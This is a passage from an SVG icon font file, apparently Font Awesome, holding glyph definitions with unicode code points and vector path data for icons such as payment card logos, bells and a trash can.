t-150 -225t-225 -150t-273.5 -55.5t-273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5q182 0 343 -89l64 64q19 19 45.5 19t45.5 -19l68 -68zM1521 1359q-10 -10 -22 -10q-13 0 -23 10l-91 90q-9 10 -9 23t9 23q10 9 23 9t23 -9l90 -91
q10 -9 10 -22.5t-10 -22.5zM1751 1129q-11 -9 -23 -9t-23 9l-90 91q-10 9 -10 22.5t10 22.5q9 10 22.5 10t22.5 -10l91 -90q9 -10 9 -23t-9 -23zM1792 1312q0 -14 -9 -23t-23 -9h-96q-14 0 -23 9t-9 23t9 23t23 9h96q14 0 23 -9t9 -23zM1600 1504v-96q0 -14 -9 -23t-23 -9
t-23 9t-9 23v96q0 14 9 23t23 9t23 -9t9 -23zM1751 1449l-91 -90q-10 -10 -22 -10q-13 0 -23 10q-10 9 -10 22.5t10 22.5l90 91q10 9 23 9t23 -9q9 -10 9 -23t-9 -23z" />
    <glyph glyph-name="_453" unicode="&#xf1e3;" horiz-adv-x="1792" 
d="M609 720l287 208l287 -208l-109 -336h-355zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM1515 186q149 203 149 454v3l-102 -89l-240 224l63 323
l134 -12q-150 206 -389 282l53 -124l-287 -159l-287 159l53 124q-239 -76 -389 -282l135 12l62 -323l-240 -224l-102 89v-3q0 -251 149 -454l30 132l326 -40l139 -298l-116 -69q117 -39 240 -39t240 39l-116 69l139 298l326 40z" />
    <glyph glyph-name="_454" unicode="&#xf1e4;" horiz-adv-x="1792" 
d="M448 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM256 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM832 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23
v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM640 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM66 768q-28 0 -47 19t-19 46v129h514v-129q0 -27 -19 -46t-46 -19h-383zM1216 224v-192q0 -14 -9 -23t-23 -9h-192
q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1024 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1600 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23
zM1408 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 1016v-13h-514v10q0 104 -382 102q-382 -1 -382 -102v-10h-514v13q0 17 8.5 43t34 64t65.5 75.5t110.5 76t160 67.5t224 47.5t293.5 18.5t293 -18.5t224 -47.5
t160.5 -67.5t110.5 -76t65.5 -75.5t34 -64t8.5 -43zM1792 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 962v-129q0 -27 -19 -46t-46 -19h-384q-27 0 -46 19t-19 46v129h514z" />
    <glyph glyph-name="_455" unicode="&#xf1e5;" horiz-adv-x="1792" 
d="M704 1216v-768q0 -26 -19 -45t-45 -19v-576q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v512l249 873q7 23 31 23h424zM1024 1216v-704h-256v704h256zM1792 320v-512q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v576q-26 0 -45 19t-19 45v768h424q24 0 31 -23z
M736 1504v-224h-352v224q0 14 9 23t23 9h288q14 0 23 -9t9 -23zM1408 1504v-224h-352v224q0 14 9 23t23 9h288q14 0 23 -9t9 -23z" />
    <glyph glyph-name="_456" unicode="&#xf1e6;" horiz-adv-x="1792" 
d="M1755 1083q37 -38 37 -90.5t-37 -90.5l-401 -400l150 -150l-160 -160q-163 -163 -389.5 -186.5t-411.5 100.5l-362 -362h-181v181l362 362q-124 185 -100.5 411.5t186.5 389.5l160 160l150 -150l400 401q38 37 91 37t90 -37t37 -90.5t-37 -90.5l-400 -401l234 -234
l401 400q38 37 91 37t90 -37z" />
    <glyph glyph-name="_457" unicode="&#xf1e7;" horiz-adv-x="1792" 
d="M873 796q0 -83 -63.5 -142.5t-152.5 -59.5t-152.5 59.5t-63.5 142.5q0 84 63.5 143t152.5 59t152.5 -59t63.5 -143zM1375 796q0 -83 -63 -142.5t-153 -59.5q-89 0 -152.5 59.5t-63.5 142.5q0 84 63.5 143t152.5 59q90 0 153 -59t63 -143zM1600 616v667q0 87 -32 123.5
t-111 36.5h-1112q-83 0 -112.5 -34t-29.5 -126v-673q43 -23 88.5 -40t81 -28t81 -18.5t71 -11t70 -4t58.5 -0.5t56.5 2t44.5 2q68 1 95 -27q6 -6 10 -9q26 -25 61 -51q7 91 118 87q5 0 36.5 -1.5t43 -2t45.5 -1t53 1t54.5 4.5t61 8.5t62 13.5t67 19.5t67.5 27t72 34.5z
M1763 621q-121 -149 -372 -252q84 -285 -23 -465q-66 -113 -183 -148q-104 -32 -182 15q-86 51 -82 164l-1 326v1q-8 2 -24.5 6t-23.5 5l-1 -338q4 -114 -83 -164q-79 -47 -183 -15q-117 36 -182 150q-105 180 -22 463q-251 103 -372 252q-25 37 -4 63t60 -1q4 -2 11.5 -7
t10.5 -8v694q0 72 47 123t114 51h1257q67 0 114 -51t47 -123v-694l21 15q39 27 60 1t-4 -63z" />
    <glyph glyph-name="_458" unicode="&#xf1e8;" horiz-adv-x="1792" 
d="M896 1102v-434h-145v434h145zM1294 1102v-434h-145v434h145zM1294 342l253 254v795h-1194v-1049h326v-217l217 217h398zM1692 1536v-1013l-434 -434h-326l-217 -217h-217v217h-398v1158l109 289h1483z" />
    <glyph glyph-name="_459" unicode="&#xf1e9;" 
d="M773 217v-127q-1 -292 -6 -305q-12 -32 -51 -40q-54 -9 -181.5 38t-162.5 89q-13 15 -17 36q-1 12 4 26q4 10 34 47t181 216q1 0 60 70q15 19 39.5 24.5t49.5 -3.5q24 -10 37.5 -29t12.5 -42zM624 468q-3 -55 -52 -70l-120 -39q-275 -88 -292 -88q-35 2 -54 36
q-12 25 -17 75q-8 76 1 166.5t30 124.5t56 32q13 0 202 -77q71 -29 115 -47l84 -34q23 -9 35.5 -30.5t11.5 -48.5zM1450 171q-7 -54 -91.5 -161t-135.5 -127q-37 -14 -63 7q-14 10 -184 287l-47 77q-14 21 -11.5 46t19.5 46q35 43 83 26q1 -1 119 -40q203 -66 242 -79.5
t47 -20.5q28 -22 22 -61zM778 803q5 -102 -54 -122q-58 -17 -114 71l-378 598q-8 35 19 62q41 43 207.5 89.5t224.5 31.5q40 -10 49 -45q3 -18 22 -305.5t24 -379.5zM1440 695q3 -39 -26 -59q-15 -10 -329 -86q-67 -15 -91 -23l1 2q-23 -6 -46 4t-37 32q-30 47 0 87
q1 1 75 102q125 171 150 204t34 39q28 19 65 2q48 -23 123 -133.5t81 -167.5v-3z" />
    <glyph glyph-name="_460" unicode="&#xf1ea;" horiz-adv-x="2048" 
d="M1024 1024h-384v-384h384v384zM1152 384v-128h-640v128h640zM1152 1152v-640h-640v640h640zM1792 384v-128h-512v128h512zM1792 640v-128h-512v128h512zM1792 896v-128h-512v128h512zM1792 1152v-128h-512v128h512zM256 192v960h-128v-960q0 -26 19 -45t45 -19t45 19
t19 45zM1920 192v1088h-1536v-1088q0 -33 -11 -64h1483q26 0 45 19t19 45zM2048 1408v-1216q0 -80 -56 -136t-136 -56h-1664q-80 0 -136 56t-56 136v1088h256v128h1792z" />
    <glyph glyph-name="_461" unicode="&#xf1eb;" horiz-adv-x="2048" 
d="M1024 13q-20 0 -93 73.5t-73 93.5q0 32 62.5 54t103.5 22t103.5 -22t62.5 -54q0 -20 -73 -93.5t-93 -73.5zM1294 284q-2 0 -40 25t-101.5 50t-128.5 25t-128.5 -25t-101 -50t-40.5 -25q-18 0 -93.5 75t-75.5 93q0 13 10 23q78 77 196 121t233 44t233 -44t196 -121
q10 -10 10 -23q0 -18 -75.5 -93t-93.5 -75zM1567 556q-11 0 -23 8q-136 105 -252 154.5t-268 49.5q-85 0 -170.5 -22t-149 -53t-113.5 -62t-79 -53t-31 -22q-17 0 -92 75t-75 93q0 12 10 22q132 132 320 205t380 73t380 -73t320 -205q10 -10 10 -22q0 -18 -75 -93t-92 -75z
M1838 827q-11 0 -22 9q-179 157 -371.5 236.5t-420.5 79.5t-420.5 -79.5t-371.5 -236.5q-11 -9 -22 -9q-17 0 -92.5 75t-75.5 93q0 13 10 23q187 186 445 288t527 102t527 -102t445 -288q10 -10 10 -23q0 -18 -75.5 -93t-92.5 -75z" />
    <glyph glyph-name="_462" unicode="&#xf1ec;" horiz-adv-x="1792" 
d="M384 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM384 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5
t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1152 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5
t37.5 90.5zM384 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1152 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 768q0 53 -37.5 90.5t-90.5 37.5
t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1536 0v384q0 52 -38 90t-90 38t-90 -38t-38 -90v-384q0 -52 38 -90t90 -38t90 38t38 90zM1152 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5z
M1536 1088v256q0 26 -19 45t-45 19h-1280q-26 0 -45 -19t-19 -45v-256q0 -26 19 -45t45 -19h1280q26 0 45 19t19 45zM1536 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 1408v-1536q0 -52 -38 -90t-90 -38
h-1408q-52 0 -90 38t-38 90v1536q0 52 38 90t90 38h1408q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_463" unicode="&#xf1ed;" 
d="M1519 890q18 -84 -4 -204q-87 -444 -565 -444h-44q-25 0 -44 -16.5t-24 -42.5l-4 -19l-55 -346l-2 -15q-5 -26 -24.5 -42.5t-44.5 -16.5h-251q-21 0 -33 15t-9 36q9 56 26.5 168t26.5 168t27 167.5t27 167.5q5 37 43 37h131q133 -2 236 21q175 39 287 144q102 95 155 246
q24 70 35 133q1 6 2.5 7.5t3.5 1t6 -3.5q79 -59 98 -162zM1347 1172q0 -107 -46 -236q-80 -233 -302 -315q-113 -40 -252 -42q0 -1 -90 -1l-90 1q-100 0 -118 -96q-2 -8 -85 -530q-1 -10 -12 -10h-295q-22 0 -36.5 16.5t-11.5 38.5l232 1471q5 29 27.5 48t51.5 19h598
q34 0 97.5 -13t111.5 -32q107 -41 163.5 -123t56.5 -196z" />
    <glyph glyph-name="_464" unicode="&#xf1ee;" horiz-adv-x="1792" 
d="M441 864q33 0 52 -26q266 -364 362 -774h-446q-127 441 -367 749q-12 16 -3 33.5t29 17.5h373zM1000 507q-49 -199 -125 -393q-79 310 -256 594q40 221 44 449q211 -340 337 -650zM1099 1216q235 -324 384.5 -698.5t184.5 -773.5h-451q-41 665 -553 1472h435zM1792 640
q0 -424 -101 -812q-67 560 -359 1083q-25 301 -106 584q-4 16 5.5 28.5t25.5 12.5h359q21 0 38.5 -13t22.5 -33q115 -409 115 -850z" />
    <glyph glyph-name="uniF1F0" unicode="&#xf1f0;" horiz-adv-x="2304" 
d="M1975 546h-138q14 37 66 179l3 9q4 10 10 26t9 26l12 -55zM531 611l-58 295q-11 54 -75 54h-268l-2 -13q311 -79 403 -336zM710 960l-162 -438l-17 89q-26 70 -85 129.5t-131 88.5l135 -510h175l261 641h-176zM849 318h166l104 642h-166zM1617 944q-69 27 -149 27
q-123 0 -201 -59t-79 -153q-1 -102 145 -174q48 -23 67 -41t19 -39q0 -30 -30 -46t-69 -16q-86 0 -156 33l-22 11l-23 -144q74 -34 185 -34q130 -1 208.5 59t80.5 160q0 106 -140 174q-49 25 -71 42t-22 38q0 22 24.5 38.5t70.5 16.5q70 1 124 -24l15 -8zM2042 960h-128
q-65 0 -87 -54l-246 -588h174l35 96h212q5 -22 20 -96h154zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_466" unicode="&#xf1f1;" horiz-adv-x="2304" 
d="M1119 1195q-128 85 -281 85q-103 0 -197.5 -40.5t-162.5 -108.5t-108.5 -162t-40.5 -197q0 -104 40.5 -198t108.5 -162t162 -108.5t198 -40.5q153 0 281 85q-131 107 -178 265.5t0.5 316.5t177.5 265zM1152 1171q-126 -99 -172 -249.5t-0.5 -300.5t172.5 -249
q127 99 172.5 249t-0.5 300.5t-172 249.5zM1185 1195q130 -107 177.5 -265.5t0.5 -317t-178 -264.5q128 -85 281 -85q104 0 198 40.5t162 108.5t108.5 162t40.5 198q0 103 -40.5 197t-108.5 162t-162.5 108.5t-197.5 40.5q-153 0 -281 -85zM1926 473h7v3h-17v-3h7v-17h3v17z
M1955 456h4v20h-5l-6 -13l-6 13h-5v-20h3v15l6 -13h4l5 13v-15zM1947 16v-2h-2h-3v3h3h2v-1zM1947 7h3l-4 5h2l1 1q1 1 1 3t-1 3l-1 1h-3h-6v-13h3v5h1zM685 75q0 19 11 31t30 12q18 0 29 -12.5t11 -30.5q0 -19 -11 -31t-29 -12q-19 0 -30 12t-11 31zM1158 119q30 0 35 -32
h-70q5 32 35 32zM1514 75q0 19 11 31t29 12t29.5 -12.5t11.5 -30.5q0 -19 -11 -31t-30 -12q-18 0 -29 12t-11 31zM1786 75q0 18 11.5 30.5t29.5 12.5t29.5 -12.5t11.5 -30.5q0 -19 -11.5 -31t-29.5 -12t-29.5 12.5t-11.5 30.5zM1944 3q-2 0 -4 1q-1 0 -3 2t-2 3q-1 2 -1 4
q0 3 1 4q0 2 2 4l1 1q2 0 2 1q2 1 4 1q3 0 4 -1l4 -2l2 -4v-1q1 -2 1 -3l-1 -1v-3t-1 -1l-1 -2q-2 -2 -4 -2q-1 -1 -4 -1zM599 7h30v85q0 24 -14.5 38.5t-39.5 15.5q-32 0 -47 -24q-14 24 -45 24q-24 0 -39 -20v16h-30v-135h30v75q0 36 33 36q30 0 30 -36v-75h29v75
q0 36 33 36q30 0 30 -36v-75zM765 7h29v68v67h-29v-16q-17 20 -43 20q-29 0 -48 -20t-19 -51t19 -51t48 -20q28 0 43 20v-17zM943 48q0 34 -47 40l-14 2q-23 4 -23 14q0 15 25 15q23 0 43 -11l12 24q-22 14 -55 14q-26 0 -41 -12t-15 -32q0 -33 47 -39l13 -2q24 -4 24 -14
q0 -17 -31 -17q-25 0 -45 14l-13 -23q25 -17 58 -17q29 0 45.5 12t16.5 32zM1073 14l-8 25q-13 -7 -26 -7q-19 0 -19 22v61h48v27h-48v41h-30v-41h-28v-27h28v-61q0 -50 47 -50q21 0 36 10zM1159 146q-29 0 -48 -20t-19 -51q0 -32 19.5 -51.5t49.5 -19.5q33 0 55 19l-14 22
q-18 -15 -39 -15q-34 0 -41 33h101v12q0 32 -18 51.5t-46 19.5zM1318 146q-23 0 -35 -20v16h-30v-135h30v76q0 35 29 35q10 0 18 -4l9 28q-9 4 -21 4zM1348 75q0 -31 19.5 -51t52.5 -20q29 0 48 16l-14 24q-18 -13 -35 -12q-18 0 -29.5 12t-11.5 31t11.5 31t29.5 12
q19 0 35 -12l14 24q-20 16 -48 16q-33 0 -52.5 -20t-19.5 -51zM1593 7h30v68v67h-30v-16q-15 20 -42 20q-29 0 -48.5 -20t-19.5 -51t19.5 -51t48.5 -20q28 0 42 20v-17zM1726 146q-23 0 -35 -20v16h-29v-135h29v76q0 35 29 35q10 0 18 -4l9 28q-8 4 -21 4zM1866 7h29v68v122
h-29v-71q-15 20 -43 20t-47.5 -20.5t-19.5 -50.5t19.5 -50.5t47.5 -20.5q29 0 43 20v-17zM1944 27l-2 -1h-3q-2 -1 -4 -3q-3 -1 -3 -4q-1 -2 -1 -6q0 -3 1 -5q0 -2 3 -4q2 -2 4 -3t5 -1q4 0 6 1q0 1 2 2l2 1q1 1 3 4q1 2 1 5q0 4 -1 6q-1 1 -3 4q0 1 -2 2l-2 1q-1 0 -3 0.5
t-3 0.5zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_467" unicode="&#xf1f2;" horiz-adv-x="2304" 
d="M313 759q0 -51 -36 -84q-29 -26 -89 -26h-17v220h17q61 0 89 -27q36 -31 36 -83zM2089 824q0 -52 -64 -52h-19v101h20q63 0 63 -49zM380 759q0 74 -50 120.5t-129 46.5h-95v-333h95q74 0 119 38q60 51 60 128zM410 593h65v333h-65v-333zM730 694q0 40 -20.5 62t-75.5 42
q-29 10 -39.5 19t-10.5 23q0 16 13.5 26.5t34.5 10.5q29 0 53 -27l34 44q-41 37 -98 37q-44 0 -74 -27.5t-30 -67.5q0 -35 18 -55.5t64 -36.5q37 -13 45 -19q19 -12 19 -34q0 -20 -14 -33.5t-36 -13.5q-48 0 -71 44l-42 -40q44 -64 115 -64q51 0 83 30.5t32 79.5zM1008 604
v77q-37 -37 -78 -37q-49 0 -80.5 32.5t-31.5 82.5q0 48 31.5 81.5t77.5 33.5q43 0 81 -38v77q-40 20 -80 20q-74 0 -125.5 -50.5t-51.5 -123.5t51 -123.5t125 -50.5q42 0 81 19zM2240 0v527q-65 -40 -144.5 -84t-237.5 -117t-329.5 -137.5t-417.5 -134.5t-504 -118h1569
q26 0 45 19t19 45zM1389 757q0 75 -53 128t-128 53t-128 -53t-53 -128t53 -128t128 -53t128 53t53 128zM1541 584l144 342h-71l-90 -224l-89 224h-71l142 -342h35zM1714 593h184v56h-119v90h115v56h-115v74h119v57h-184v-333zM2105 593h80l-105 140q76 16 76 94q0 47 -31 73
t-87 26h-97v-333h65v133h9zM2304 1274v-1268q0 -56 -38.5 -95t-93.5 -39h-2040q-55 0 -93.5 39t-38.5 95v1268q0 56 38.5 95t93.5 39h2040q55 0 93.5 -39t38.5 -95z" />
    <glyph glyph-name="f1f3" unicode="&#xf1f3;" horiz-adv-x="2304" 
d="M119 854h89l-45 108zM740 328l74 79l-70 79h-163v-49h142v-55h-142v-54h159zM898 406l99 -110v217zM1186 453q0 33 -40 33h-84v-69h83q41 0 41 36zM1475 457q0 29 -42 29h-82v-61h81q43 0 43 32zM1197 923q0 29 -42 29h-82v-60h81q43 0 43 31zM1656 854h89l-44 108z
M699 1009v-271h-66v212l-94 -212h-57l-94 212v-212h-132l-25 60h-135l-25 -60h-70l116 271h96l110 -257v257h106l85 -184l77 184h108zM1255 453q0 -20 -5.5 -35t-14 -25t-22.5 -16.5t-26 -10t-31.5 -4.5t-31.5 -1t-32.5 0.5t-29.5 0.5v-91h-126l-80 90l-83 -90h-256v271h260
l80 -89l82 89h207q109 0 109 -89zM964 794v-56h-217v271h217v-57h-152v-49h148v-55h-148v-54h152zM2304 235v-229q0 -55 -38.5 -94.5t-93.5 -39.5h-2040q-55 0 -93.5 39.5t-38.5 94.5v678h111l25 61h55l25 -61h218v46l19 -46h113l20 47v-47h541v99l10 1q10 0 10 -14v-86h279
v23q23 -12 55 -18t52.5 -6.5t63 0.5t51.5 1l25 61h56l25 -61h227v58l34 -58h182v378h-180v-44l-25 44h-185v-44l-23 44h-249q-69 0 -109 -22v22h-172v-22q-24 22 -73 22h-628l-43 -97l-43 97h-198v-44l-22 44h-169l-78 -179v391q0 55 38.5 94.5t93.5 39.5h2040
q55 0 93.5 -39.5t38.5 -94.5v-678h-120q-51 0 -81 -22v22h-177q-55 0 -78 -22v22h-316v-22q-31 22 -87 22h-209v-22q-23 22 -91 22h-234l-54 -58l-50 58h-349v-378h343l55 59l52 -59h211v89h21q59 0 90 13v-102h174v99h8q8 0 10 -2t2 -10v-87h529q57 0 88 24v-24h168
q60 0 95 17zM1546 469q0 -23 -12 -43t-34 -29q25 -9 34 -26t9 -46v-54h-65v45q0 33 -12 43.5t-46 10.5h-69v-99h-65v271h154q48 0 77 -15t29 -58zM1269 936q0 -24 -12.5 -44t-33.5 -29q26 -9 34.5 -25.5t8.5 -46.5v-53h-65q0 9 0.5 26.5t0 25t-3 18.5t-8.5 16t-17.5 8.5
t-29.5 3.5h-70v-98h-64v271l153 -1q49 0 78 -14.5t29 -57.5zM1798 327v-56h-216v271h216v-56h-151v-49h148v-55h-148v-54zM1372 1009v-271h-66v271h66zM2065 357q0 -86 -102 -86h-126v58h126q34 0 34 25q0 16 -17 21t-41.5 5t-49.5 3.5t-42 22.5t-17 55q0 39 26 60t66 21
h130v-57h-119q-36 0 -36 -25q0 -16 17.5 -20.5t42 -4t49 -2.5t42 -21.5t17.5 -54.5zM2304 407v-101q-24 -35 -88 -35h-125v58h125q33 0 33 25q0 13 -12.5 19t-31 5.5t-40 2t-40 8t-31 24t-12.5 48.5q0 39 26.5 60t66.5 21h129v-57h-118q-36 0 -36 -25q0 -20 29 -22t68.5 -5
t56.5 -26zM2139 1008v-270h-92l-122 203v-203h-132l-26 60h-134l-25 -60h-75q-129 0 -129 133q0 138 133 138h63v-59q-7 0 -28 1t-28.5 0.5t-23 -2t-21.5 -6.5t-14.5 -13.5t-11.5 -23t-3 -33.5q0 -38 13.5 -58t49.5 -20h29l92 213h97l109 -256v256h99l114 -188v188h66z" />
    <glyph glyph-name="_469" unicode="&#xf1f4;" horiz-adv-x="2304" 
d="M745 630q0 -37 -25.5 -61.5t-62.5 -24.5q-29 0 -46.5 16t-17.5 44q0 37 25 62.5t62 25.5q28 0 46.5 -16.5t18.5 -45.5zM1530 779q0 -42 -22 -57t-66 -15l-32 -1l17 107q2 11 13 11h18q22 0 35 -2t25 -12.5t12 -30.5zM1881 630q0 -36 -25.5 -61t-61.5 -25q-29 0 -47 16
t-18 44q0 37 25 62.5t62 25.5q28 0 46.5 -16.5t18.5 -45.5zM513 801q0 59 -38.5 85.5t-100.5 26.5h-160q-19 0 -21 -19l-65 -408q-1 -6 3 -11t10 -5h76q20 0 22 19l18 110q1 8 7 13t15 6.5t17 1.5t19 -1t14 -1q86 0 135 48.5t49 134.5zM822 489l41 261q1 6 -3 11t-10 5h-76
q-14 0 -17 -33q-27 40 -95 40q-72 0 -122.5 -54t-50.5 -127q0 -59 34.5 -94t92.5 -35q28 0 58 12t48 32q-4 -12 -4 -21q0 -16 13 -16h69q19 0 22 19zM1269 752q0 5 -4 9.5t-9 4.5h-77q-11 0 -18 -10l-106 -156l-44 150q-5 16 -22 16h-75q-5 0 -9 -4.5t-4 -9.5q0 -2 19.5 -59
t42 -123t23.5 -70q-82 -112 -82 -120q0 -13 13 -13h77q11 0 18 10l255 368q2 2 2 7zM1649 801q0 59 -38.5 85.5t-100.5 26.5h-159q-20 0 -22 -19l-65 -408q-1 -6 3 -11t10 -5h82q12 0 16 13l18 116q1 8 7 13t15 6.5t17 1.5t19 -1t14 -1q86 0 135 48.5t49 134.5zM1958 489
l41 261q1 6 -3 11t-10 5h-76q-14 0 -17 -33q-26 40 -95 40q-72 0 -122.5 -54t-50.5 -127q0 -59 34.5 -94t92.5 -35q29 0 59 12t47 32q0 -1 -2 -9t-2 -12q0 -16 13 -16h69q19 0 22 19zM2176 898v1q0 14 -13 14h-74q-11 0 -13 -11l-65 -416l-1 -2q0 -5 4 -9.5t10 -4.5h66
q19 0 21 19zM392 764q-5 -35 -26 -46t-60 -11l-33 -1l17 107q2 11 13 11h19q40 0 58 -11.5t12 -48.5zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_470" unicode="&#xf1f5;" horiz-adv-x="2304" 
d="M1597 633q0 -69 -21 -106q-19 -35 -52 -35q-23 0 -41 9v224q29 30 57 30q57 0 57 -122zM2035 669h-110q6 98 56 98q51 0 54 -98zM476 534q0 59 -33 91.5t-101 57.5q-36 13 -52 24t-16 25q0 26 38 26q58 0 124 -33l18 112q-67 32 -149 32q-77 0 -123 -38q-48 -39 -48 -109
q0 -58 32.5 -90.5t99.5 -56.5q39 -14 54.5 -25.5t15.5 -27.5q0 -31 -48 -31q-29 0 -70 12.5t-72 30.5l-18 -113q72 -41 168 -41q81 0 129 37q51 41 51 117zM771 749l19 111h-96v135l-129 -21l-18 -114l-46 -8l-17 -103h62v-219q0 -84 44 -120q38 -30 111 -30q32 0 79 11v118
q-32 -7 -44 -7q-42 0 -42 50v197h77zM1087 724v139q-15 3 -28 3q-32 0 -55.5 -16t-33.5 -46l-10 56h-131v-471h150v306q26 31 82 31q16 0 26 -2zM1124 389h150v471h-150v-471zM1746 638q0 122 -45 179q-40 52 -111 52q-64 0 -117 -56l-8 47h-132v-645l150 25v151
q36 -11 68 -11q83 0 134 56q61 65 61 202zM1278 986q0 33 -23 56t-56 23t-56 -23t-23 -56t23 -56.5t56 -23.5t56 23.5t23 56.5zM2176 629q0 113 -48 176q-50 64 -144 64q-96 0 -151.5 -66t-55.5 -180q0 -128 63 -188q55 -55 161 -55q101 0 160 40l-16 103q-57 -31 -128 -31
q-43 0 -63 19q-23 19 -28 66h248q2 14 2 52zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_471" unicode="&#xf1f6;" horiz-adv-x="2048" 
d="M1558 684q61 -356 298 -556q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-180.5 74.5t-75.5 180.5zM1024 -176q16 0 16 16t-16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5zM2026 1424q8 -10 7.5 -23.5t-10.5 -22.5
l-1872 -1622q-10 -8 -23.5 -7t-21.5 11l-84 96q-8 10 -7.5 23.5t10.5 21.5l186 161q-19 32 -19 66q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q124 -18 219 -82.5t148 -157.5
l418 363q10 8 23.5 7t21.5 -11z" />
    <glyph glyph-name="_472" unicode="&#xf1f7;" horiz-adv-x="2048" 
d="M1040 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM503 315l877 760q-42 88 -132.5 146.5t-223.5 58.5q-93 0 -169.5 -31.5t-121.5 -80.5t-69 -103t-24 -105q0 -384 -137 -645zM1856 128
q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-180.5 74.5t-75.5 180.5l149 129h757q-166 187 -227 459l111 97q61 -356 298 -556zM1942 1520l84 -96q8 -10 7.5 -23.5t-10.5 -22.5l-1872 -1622q-10 -8 -23.5 -7t-21.5 11l-84 96q-8 10 -7.5 23.5t10.5 21.5l186 161
q-19 32 -19 66q50 42 91 88t85 119.5t74.5 158.5t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q124 -18 219 -82.5t148 -157.5l418 363q10 8 23.5 7t21.5 -11z" />
    <glyph glyph-name="_473" unicode="&#xf1f8;" horiz-adv-x="1408" 
d="M512 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM768 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1024 160v704q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-704
q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM480 1152h448l-48 117q-7 9 -17 11h-317q-10 -2 -17 -11zM1408 1120v-64q0 -14 -9 -23t-23 -9h-96v-948q0 -83 -47 -143.5t-113 -60.5h-832q-66 0 -113 58.5t-47 141.5v952h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h309l70 167
q15 37 54 63t79 26h320q40 0 79 -26t54 -63l70 -167h309q14 0 23 -9t9 -23z" />
    <glyph glyph-name="_474" unicode="&#xf1f9;" 
